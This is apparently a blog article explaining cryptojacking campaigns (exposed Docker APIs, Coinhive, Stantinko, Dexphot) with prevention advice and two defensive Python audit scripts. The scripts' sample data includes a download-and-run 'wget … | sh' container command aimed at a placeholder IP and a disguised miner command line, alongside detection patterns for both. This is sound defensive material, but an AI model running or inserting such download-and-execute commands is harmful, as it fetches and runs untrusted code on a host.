Cyber criminals are cryptojacking your devices: hijacking your computing power to mine cryptocurrency, and they are getting very good at it. It has become one of the fastest-growing cyber crimes of recent years. These attackers are after computing power to run mining software, most of the time for Monero. They look for a security weakness, install a miner and collect the rewards, burning the hardware and electricity of companies and individuals to generate Monero for themselves. But how does it work exactly?
Cryptojackers are rarely elite hackers; they take advantage of existing vulnerabilities. Most of the time they use well-known exploits and scan for unpatched computers and servers. In other cases they rely on a user clicking a link or visiting a certain website. Either way the goal is the same: get a small piece of software onto the target machine and keep it running.
American internet security firm Bad Packets discovered 'opportunistic mass scanning activity' aimed at Docker servers on November 26th, 2019. It is a textbook example of cryptojacking. The attackers scan the internet for Docker hosts whose management API is exposed without authentication. As soon as they find one, they use that API to start an Alpine Linux container which downloads and runs a script, and that script in turn installs XMRig, the most widely used open-source mining software for Monero.
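As an added example (it is not code from the article or from Bad Packets), here is a small Python audit for the two conditions behind the campaign described above: a Docker daemon configured to listen on plain TCP without TLS client authentication, and a container whose command line downloads a script and pipes it into a shell, optionally with a privileged flag or a host root mount. The daemon.json and `docker inspect` records are constructed, the IP address comes from a documentation range, and the indicator patterns are assumptions a defender would tune.

```python
"""Audit a Docker host for an exposed API and for dropper-style containers.
Added example, not from the original article; all sample records are constructed."""
import json
import re

# Command-line patterns of a download-and-run dropper (assumed indicators).
DOWNLOAD_AND_RUN = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash|ash)\b", re.IGNORECASE)
MINER_HINTS = re.compile(r"xmrig|stratum\+(tcp|ssl)://|--donate-level", re.IGNORECASE)
# Host paths that hand a container control over the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/etc", "/root"}


def daemon_exposed(daemon_config: dict) -> list:
    """Findings for a parsed /etc/docker/daemon.json.

    A 'hosts' entry on tcp:// without 'tlsverify' means anyone who can reach the
    port can create containers with the privileges of the Docker daemon (root).
    """
    findings = []
    for host in daemon_config.get("hosts", []):
        if not host.startswith("tcp://"):
            continue
        if not daemon_config.get("tlsverify"):
            findings.append(f"API on {host} without TLS client authentication")
        if "0.0.0.0" in host or "[::]" in host:
            findings.append(f"API bound to all interfaces: {host}")
    return findings


def suspicious_container(inspect_record: dict) -> list:
    """Findings for one element of `docker inspect <container>` output."""
    findings = []
    cfg = inspect_record.get("Config", {})
    host_cfg = inspect_record.get("HostConfig", {})
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    if DOWNLOAD_AND_RUN.search(cmdline):
        findings.append(f"download-and-execute command: {cmdline}")
    if MINER_HINTS.search(cmdline):
        findings.append("miner indicators in command line")
    if host_cfg.get("Privileged"):
        findings.append("privileged container")
    for bind in host_cfg.get("Binds") or []:
        host_path = bind.split(":")[0]
        if host_path in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path mounted: {bind}")
    return findings


# Constructed samples. 203.0.113.10 is a documentation address (RFC 5737).
DAEMON_JSON = json.loads(
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
)
MALICIOUS_CONTAINER = {
    "Config": {
        "Image": "alpine:latest",
        "Entrypoint": ["/bin/sh", "-c"],
        "Cmd": ["wget -q -O - http://203.0.113.10/setup.sh | sh"],
    },
    "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"]},
}
BENIGN_CONTAINER = {
    "Config": {
        "Image": "nginx:1.25",
        "Entrypoint": ["/docker-entrypoint.sh"],
        "Cmd": ["nginx", "-g", "daemon off;"],
    },
    "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}

if __name__ == "__main__":
    for finding in daemon_exposed(DAEMON_JSON):
        print("daemon:", finding)
    for name, record in (("malicious", MALICIOUS_CONTAINER), ("benign", BENIGN_CONTAINER)):
        for finding in suspicious_container(record):
            print(f"{name}:", finding)
```

On a live host, feed it the parsed daemon.json and the JSON list that `docker inspect` prints for the running containers. The safe configuration keeps the API on the Unix socket only, or puts TLS client certificates (`tlsverify`) and a firewall in front of any TCP listener.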
Coinhive was a founding father
Docker servers are enterprise solutions, and most individuals don't run them at home. That doesn't mean you and I are safe though. Cryptojacking happens in many forms, and for the attackers it doesn't matter whether the target is a company or an individual. That is why it is important to be aware of the ways cryptojacking can reach you.
The hype around cryptojacking started with Coinhive. The service offered a JavaScript miner that website owners could embed in their pages to mine Monero with the CPUs of the site's visitors. It launched in 2017 as a way for website owners to earn some money, but quickly became the center of controversy: the script was also injected into hacked websites and browser extensions without the visitors' knowledge, and the service shut down in March 2019.
Next level crypto crime
Embedding a script in a website is a simple way to use other people's computing resources. Cryptojacking is on the rise and unlikely to stop any time soon. In 2018 the amount of crypto-mining malware increased by 4,467 percent. Coinhive drove much of that number, but it wasn't the only source. In the first quarter of 2019 ransomware attacks grew by 188 percent, while crypto mining grew another 29 percent.
A website security company reported in October 2019 that hackers were exploiting vulnerabilities in outdated WordPress plugins. They were also distributing copies of popular plugins with malicious code added, to trick site owners into installing them. Once installed, such a plugin runs an executable that gives the attackers a backdoor into the server, and because that backdoor persists independently of the plugin, removing the plugin does not remove the access. The attacker can then use the web server to mine Monero. In similar fashion, attackers have hidden malicious code inside .WAV audio files; the payload is extracted and executed by a separate loader already on the machine, not by playing the file, so the audio file itself looks harmless.
McAfee Labs reported that cyber crime is becoming a lot more sophisticated. Hackers are searching for vulnerabilities, and any internet-connected device with computing power will do. Last year malware targeting Internet of Things (IoT) devices grew by 200 percent. Devices like routers and IP cameras don't deliver much mining power individually, but volume is what the attackers are after. Power is in the numbers.
Cryptojacking is in the numbers
Slovakian security firm ESET has uncovered that the cyber criminals behind the Stantinko botnet are now deploying cryptocurrency mining software. To make that mining infrastructure hard to take down, they use YouTube and its 2 billion monthly users: the miner module fetches the addresses of its mining proxies from the description text of YouTube videos, so the operators can swap infrastructure without updating the malware on infected machines.
The hackers behind Stantinko target users in Russia, Ukraine, Belarus and Kazakhstan. According to ESET the botnet has infected about 500 thousand devices. Reportedly YouTube has removed the channels and videos that carried the miner's proxy addresses. But it is unlikely that Stantinko will stop, so it remains important not to click links or install software from unknown sources.
Next level cryptojacking malware
Stantinko's use of YouTube as part of its infrastructure is unusual, but getting the miner onto the victim's machine still comes down to the same thing as in other campaigns: tricking the user into running something. Sometimes, however, things get far more complicated. On November 26th, 2019 Microsoft reported on cryptojacking malware called Dexphot, which has infected about 80 thousand computers worldwide since October 2018.
If someone has a plain copy of XMRig running on their computer, it is easy to kill and remove. Dexphot is much more sophisticated: it runs its payload inside legitimate Windows processes, keeps several scheduled tasks and monitoring processes that reinstall the malware as soon as defenders remove a component, and changes file names and download URLs so that signature-based detection keeps missing it.
Dexphot also received regular updates, underlining its ability to evolve into an ever-changing threat. This is next-level malware, and it shows how important it is to stay safe on the web.
How to prevent cryptojacking
Is your computer becoming slow, or is your processor working overtime while you aren't doing anything demanding? Your computer might be mining Monero for somebody else. Check which process is using the CPU, and consider installing quality security software. To prevent cryptojacking, live by these golden rules:
- Never click on shady links or visit shady websites.
- Never open e-mails or attachments from unknown sources.
- Install ad blocking browser extensions, or just use Brave.
- Keep your software, browser extensions, and mobile apps up-to-date.
- And if you run a business: never expose management APIs such as the Docker daemon to the internet without authentication, and educate your employees!
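As an added example (not code from the article), the following Python triage script turns the "processor working overtime" hint into a concrete check on a Linux host: it parses process-list and connection output, flags processes that carry miner-style command-line options, burn CPU from a scratch directory while posing as a kernel thread, or talk to common pool ports, and correlates the two views by pid. The `ps` and `ss` output is constructed, the IP addresses come from documentation ranges, and the indicator lists (XMRig-style options, pool ports) are assumptions to tune per environment.

```python
"""Triage a Linux host for a running cryptominer from ps and ss output.
Added example, not from the original article; sample output is constructed."""
import re

# XMRig-style options and stratum URLs (assumed indicators, not exhaustive).
CMDLINE_INDICATORS = re.compile(
    r"stratum\+(tcp|ssl)://|--donate-level|--cpu-max-threads-hint|\bxmrig\b|--coin[ =]monero",
    re.IGNORECASE,
)
# Ports commonly used by public mining pools (assumption; tune per environment).
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}
# Directories a legitimate long-running service rarely executes from.
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
CPU_THRESHOLD = 80.0  # percent of one core, sustained


def parse_ps(ps_output: str) -> list:
    """Parse lines from `ps -eo pid,pcpu,comm,args --no-headers`."""
    procs = []
    for line in ps_output.strip().splitlines():
        parts = line.split(None, 3)  # args may contain spaces, keep it whole
        if len(parts) < 4:
            continue
        pid, pcpu, comm, args = parts
        procs.append({"pid": int(pid), "pcpu": float(pcpu), "comm": comm, "args": args})
    return procs


def flag_processes(procs: list) -> dict:
    """Map pid -> reasons for processes that look like miners."""
    flagged = {}
    for proc in procs:
        reasons = []
        if CMDLINE_INDICATORS.search(proc["args"]):
            reasons.append("miner options on command line")
        exe = proc["args"].split()[0]
        if proc["pcpu"] >= CPU_THRESHOLD and exe.startswith(SCRATCH_DIRS):
            reasons.append(f"{proc['pcpu']:.0f}% CPU from scratch path {exe}")
        if reasons:
            flagged[proc["pid"]] = reasons
    return flagged


def flag_connections(ss_output: str) -> dict:
    """Map pid -> peer for established TCP connections to pool ports (`ss -tnp`)."""
    flagged = {}
    for line in ss_output.strip().splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":  # skips the header line too
            continue
        peer = fields[4]
        port = int(peer.rsplit(":", 1)[1])
        pid_match = re.search(r"pid=(\d+)", line)
        if port in POOL_PORTS and pid_match:
            flagged[int(pid_match.group(1))] = peer
    return flagged


def triage(ps_output: str, ss_output: str) -> dict:
    """Combine both views into pid -> list of reasons, sorted by pid."""
    result = {}
    for pid, reasons in flag_processes(parse_ps(ps_output)).items():
        result.setdefault(pid, []).extend(reasons)
    for pid, peer in flag_connections(ss_output).items():
        result.setdefault(pid, []).append(f"connection to pool port {peer}")
    return dict(sorted(result.items()))


# Constructed sample output; 198.51.100.7 and 203.0.113.20 are RFC 5737 addresses.
# The miner poses as a kernel thread ("kworkerds") but runs from /tmp.
PS_SAMPLE = """\
    1   0.0 systemd    /sbin/init
 1203   2.1 nginx      nginx: worker process
 4242  97.5 kworkerds  /tmp/.x/kworkerds -o stratum+tcp://198.51.100.7:3333 -u WALLET --donate-level 1 -k
 5100  45.0 python3    /usr/bin/python3 /opt/app/worker.py
"""
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:51234      198.51.100.7:3333  users:(("kworkerds",pid=4242,fd=3))
ESTAB  0      0      10.0.0.5:44310      203.0.113.20:443   users:(("python3",pid=5100,fd=7))
"""

if __name__ == "__main__":
    for pid, reasons in triage(PS_SAMPLE, SS_SAMPLE).items():
        print(pid, "->", "; ".join(reasons))
```

A process that trips only the CPU rule (for example a legitimate build job) is worth a look but not a verdict; a process that matches the command-line indicators or holds a connection to a pool port is what you kill, and then you check the scheduled tasks and cron entries that put it there.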
Also published on Medium.